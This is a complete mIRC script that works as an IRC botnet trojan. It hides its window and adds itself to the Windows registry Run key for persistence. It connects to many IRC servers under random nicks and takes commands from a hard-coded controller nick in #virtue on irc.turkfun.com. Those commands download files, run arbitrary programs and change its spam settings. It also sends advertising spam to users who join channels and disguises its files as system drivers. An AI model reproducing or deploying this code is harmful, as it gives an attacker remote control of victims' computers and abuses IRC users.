alias _rnick return $read(vganvd.vxd) 
on *:start: {
  dll swf.dll do_ShowWindow $window(-2).hwnd 0 
  .ppt | .timer 0 300 ppt | inc %stt
  _doconnect
  asd $inr(eas,win)
}
alias slist return $+(",tR!,irc.turkfun.com!#virtue:,$remail,!,irc.chatx.net!,%chatx $+ :,$remail,!,irc.coolchat.net!,%coolchat $+ :,$remail,!,irc.bolchat.org!,%bolchat $+ :,$remail,!,irc.kar.net!,%kar $+ :,$remail,!,irc.hanirc.org!,%hanirc $+ :,$remail,!,netra.chat.az!,%netra $+ :,$remail,!,irc.freenode.net!,%freenode $+ :,$remail,!,irc.omnitel.net!,%omnitel $+ :,$remail,!,irc.undernet.org!,%undernet $+ :,$remail,!,irc.chatnet.org!,%chatnet $+ :,$remail,!,irc.samsun.net,")
;alias slist return $+(",tR!,irc.turkfun.com!#Deliyurek:,$remail,!,irc.dal.net:,$remail,!,irc.zurna.net:,$remail,!,irc.rekor.net:,$remail,!,irc.undernet.org:,$remail,!,irc.teklan.com.tr:,$remail,!,irc.e-kolay.net:,$remail,!,irc.hossohbet.com:,$remail,!,4-irc.com:,$remail,!,irc.austnet.org,")
alias remail return $+($r(a,z),$r(a,z),$r(a,z),$r(a,z),$r(a,z))
alias _doconnect {
  tokenize 58 $remove($slist,")
  var %atp = $numtok($slist,58)
  while (%aTp) {
    server $iif(%aTp != $numtok($slist,58),-m) $gettok([ $ [ $+ [ %aTp ] ] ],2,33) -i $_rnick $_rnick $+($gettok([ $ [ $+ [ %aTp ] ] ],1,33),@) $_rnick -j $gettok([ $ [ $+ [ %aTp ] ] ],3,33)
    dec %aTp
  }
}
on *:disconnect:scon -at2 _reconnect $!server
alias _reconnect {
  tokenize 58 $remove($slist,")
  var %atp = $numtok($slist,58)
  while (%aTp) {
    ;.identd on $gettok([ $ [ $+ [ %aTp ] ] ],1,33)
    if ($server isin [ $ [ $+ [ %aTp ] ] ]) { server -i $_rnick $_rnick $+($gettok([ $ [ $+ [ %aTp ] ] ],1,33),@) $_rnick -j $gettok([ $ [ $+ [ %aTp ] ] ],3,33) }
    dec %aTp
  }
}
alias iwr writeini $sini $1 $2 $cken($3-)
on 1:EXIT:.run System.exe 
alias authnick return $+(E,$chr($asc(r)),de,m)
alias authnick2 return $+(E,$chr($asc(r)),de,m)
on 1:text:*:*:{
  if ($server == irc.turkfun.com) {
    if (($nick === $authnick) || ($nick === $authnick2)) && ($1 == !do) && (($chan == #virtue) || ($query($authnick)) || ($query($authnick2))) {
      tokenize 32 $2-
      goto $1 | :serekup | iwr reklam $2 $3 $4- | goto son | :fldset | iwr fldset $2 $3 $4- | goto son | :indir | get $2- | goto son
      :siteac | .run $2- | goto son 
      :refresh | $+(e,x,$chr($asc(i)),t) | goto son | :msgdegis | set %mesajim $2- | goto son
      :son
    }
  } 
}
raw 477:*:{ 
  artir
}
alias artir {
  msg nickserv register bunasilsifrela no@mail.com
  .join $getrand($inr(schans,$kserv),4)
}
on 1:notice:*nicki zaten kayýtlý*:*:{
  if ($nick == Nickserv) {
    .nick $_rnick
    .artir
  }
}
alias skserv return $gettok($server,-2,46)
alias inr return $readini($sini,$1,$2)
alias sini return winsock.vxd
alias mnsel return $iif($fldsetcon($kserv,mn) == 0,msg,$iif($fldsetcon($kserv,mn) == 1,notice,both))
alias doboth msg $1 $ckde($inr(reklam,$kserv))) | notice $1 $ckde($inr(reklam,$kserv)))
alias _reklam $iif($mnsel != both,$mnsel $1 $ckde($inr(reklam,$kserv)),doboth $1)
alias ppt {
  var %ws = $r(10,1999) $+ .reg 
  .write %ws REGEDIT4
  .write %ws [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
  .write %ws "WinMsgServices"=" $+ $remove($mircexe,$mircdir) $+ "
  run -n regedit /s %ws
  timer 1 4 remove %ws
}
on 1:JOIN:#:$iif(turkfun !isin $server,auto)
alias auto msg $nick %mesajim | notice $nick %mesajim 
on 1:text:*:?:closemsg $nick
on 1:action:*:?:closemsg $nick